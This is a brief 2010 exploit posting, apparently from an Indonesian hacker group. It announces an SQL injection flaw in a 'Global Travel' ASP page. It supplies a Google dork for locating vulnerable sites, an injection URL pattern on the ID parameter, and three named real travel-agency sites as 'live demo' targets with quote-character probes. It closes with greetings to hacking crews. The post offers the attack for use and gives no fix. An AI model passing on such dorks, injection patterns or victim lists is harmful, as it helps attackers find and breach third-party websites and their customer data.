======================================================= Global Travel (Promo_detail.asp) SQL Injection Vulnerability ======================================================= [+] Author : jos_ali_joe [+] Homepage : http://josalijoe.org/ & http://indonesiancoder.com/ [+] Mail : josalijoe[at]yahoo[dot]com [+] Date : oktober 05,2010 [+] Vendor : N/A [+] Dork : inurl:"Promo_detail.asp?id=" --------------------------------------------------------------------------- [$] ExPLo!T : http://www.example.com/promo_detail.asp?ID={sql injection} [$] L!ve Demo : [~] http://www.hollistertravel.com/promo_detail.asp?ID=95%27 [~] http://www.spiritoftravel.com/promo_detail.asp?ID=31%27 [~] http://www.stillcruisintravel.com/promo_detail.asp?ID=46%27 --------------------------------------------------------------------------- Thanks : ./kaMtiEz – ibl13Z – Xrobot – tukulesto – N4ck0 – R3m1ck – jundab - asickboys- Vyc0d – Yur4kha ./ArRay – akatsuchi – K4pt3N – Gameover – antitos – yuki – pokeng – ffadill - Aury – aphe-aphe - Alecs ./Kiddies – pL4nkt0n – chaer newbie – andriecom – Abu_adam – Petimati - hakz – Virgi – Anharku – TeRRenJr Greets For : ./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker My Team : ./Indonesian Coder